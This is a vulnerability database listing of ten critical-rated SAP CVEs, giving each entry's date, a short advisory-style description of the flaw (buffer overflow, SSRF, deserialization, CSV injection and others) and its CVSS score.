Vulnerabilities > SAP > Critical
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2020-02-05 | CVE-2011-1517 | Unspecified vulnerability in SAP Netweaver 7.0 SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. | 9.8 |
| 2020-01-23 | CVE-2013-1592 | Classic Buffer Overflow vulnerability in SAP Netweaver A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. | 9.8 |
| 2019-12-11 | CVE-2019-0403 | Improper Neutralization of Formula Elements in a CSV File vulnerability in SAP Enable NOW 10/1902/1908 SAP Enable Now, before version 1911, allows an attacker to input commands into the CSV files, which will be executed when opened, leading to CSV Command Injection. | 9.8 |
| 2019-08-14 | CVE-2019-0345 | Server-Side Request Forgery (SSRF) vulnerability in SAP Netweaver Application Server Java A remote unauthenticated attacker can abuse a web service in SAP NetWeaver Application Server for Java (Administrator System Overview), versions 7.30, 7.31, 7.40, 7.50, by sending a specially crafted XML file and trick the application server into leaking authentication credentials for its own SAP Management console, resulting in Server-Side Request Forgery. | 9.8 |
| 2019-08-14 | CVE-2019-0344 | Deserialization of Untrusted Data vulnerability in SAP Commerce Cloud Due to unsafe deserialization used in SAP Commerce Cloud (virtualjdbc extension), versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, 1905, it is possible to execute arbitrary code on a target machine with 'Hybris' user rights, resulting in Code Injection. | 9.8 |
| 2019-07-10 | CVE-2019-0330 | Code Injection vulnerability in SAP Diagnostics Agent 7.20 The OS Command Plugin in the transaction GPA_ADMIN and the OSCommand Console of SAP Diagnostic Agent (LM-Service), version 7.2, allow an attacker to inject code that can be executed by the application. | 9.1 |
| 2019-06-12 | CVE-2019-0304 | Injection vulnerability in SAP products FTP Function of SAP NetWeaver AS ABAP Platform, versions- KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.73, KERNEL 7.21, 7.45, 7.49, 7.53, 7.73, allows an attacker to inject code or specifically manipulated command that can be executed by the application. | 9.8 |
| 2019-04-10 | CVE-2019-0285 | Cleartext Storage of Sensitive Information vulnerability in SAP Crystal Reports 2010 The .NET SDK WebForm Viewer in SAP Crystal Reports for Visual Studio (fixed in version 2010) discloses sensitive database information including credentials which can be misused by the attacker. | 9.8 |
| 2019-02-15 | CVE-2019-0261 | Missing Authentication for Critical Function vulnerability in SAP Landscape Management 3.0 Under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced) does not perform authentication checks properly for XS advanced platform and business users. | 9.8 |
| 2019-02-15 | CVE-2019-0259 | Unrestricted Upload of File with Dangerous Type vulnerability in SAP Businessobjects 4.2/4.3 SAP BusinessObjects, versions 4.2 and 4.3, (Visual Difference) allows an attacker to upload any file (including script files) without proper file format validation. | 9.8 |